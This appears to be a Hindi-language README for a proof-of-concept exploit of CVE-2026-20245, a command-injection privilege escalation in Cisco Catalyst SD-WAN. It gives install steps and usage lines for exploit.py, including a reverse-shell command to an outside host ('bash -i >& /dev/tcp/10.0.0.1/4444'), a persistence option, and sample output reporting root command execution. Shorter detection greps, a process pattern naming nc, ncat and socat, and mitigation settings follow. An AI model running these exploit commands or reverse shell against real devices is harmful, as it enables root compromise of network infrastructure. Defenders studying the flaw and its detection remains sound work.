
**यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।**
यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए है।
CVE-2026-20245 Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage), और Cisco Catalyst SD-WAN Validator (vBond) की CLI में एक विशेषाधिकार वृद्धि भेद्यता है। एक प्रमाणित हमलावर netadmin विशेषाधिकारों के साथ एक विशेष रूप से डिज़ाइन की गई फ़ाइल अपलोड करके root के रूप में मनमाने कमांड निष्पादित कर सकता है।
| क्षेत्र | मान |
|---|---|
| CVE | CVE-2026-20245 |
| CVSS | 7.8 (High) |
| Vector | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| घटक | CLI / CSV Upload |
| प्रकार | Command Injection (CWE-116) |
| उत्पाद | कमजोर संस्करण |
|---|---|
| Cisco Catalyst SD-WAN Manager | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 |
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC
# Instalar dependencias
pip install -r requirements.txt
# Dar permisos
chmod +x exploit.py
📦 निर्भरताएँ txt requests>=2.31.0
## 🚀 उपयोग
### संस्करण जांचें
```bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
/var/log/scripts.log)# खोजने के लिए विशिष्ट कमांड
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
# विशिष्ट प्रविष्टियाँ:
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
/home/admin/*.csv (अनधिकृत CSV फ़ाइलें)/tmp/*.csv/var/log/scripts.log असामान्य प्रविष्टियों के साथ# असामान्य root प्रक्रियाएँ खोजें
ps aux | grep -E "bash|sh|nc|ncat|socat"
| संस्करण | निश्चित रिलीज़ |
|---|---|
| 20.18.2.1 और पिछले | 20.18.3.1 |
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers
# Limitar privilegios netadmin
admin privilege restrict
| तारीख | घटना |
|---|---|
| 2026-05-14 | Cisco प्रारंभिक सलाह प्रकाशित करता है |
| 2026-06-04 | CVE आधिकारिक रूप से प्रकाशित |
| 2026-06-09 | CISA KEV में जोड़ता है |
| 2026-06-23 | पैच लगाने की CISA की अंतिम तिथि |
यह सॉफ्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी गारंटी के। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग केवल अधिकृत सिस्टम पर करें।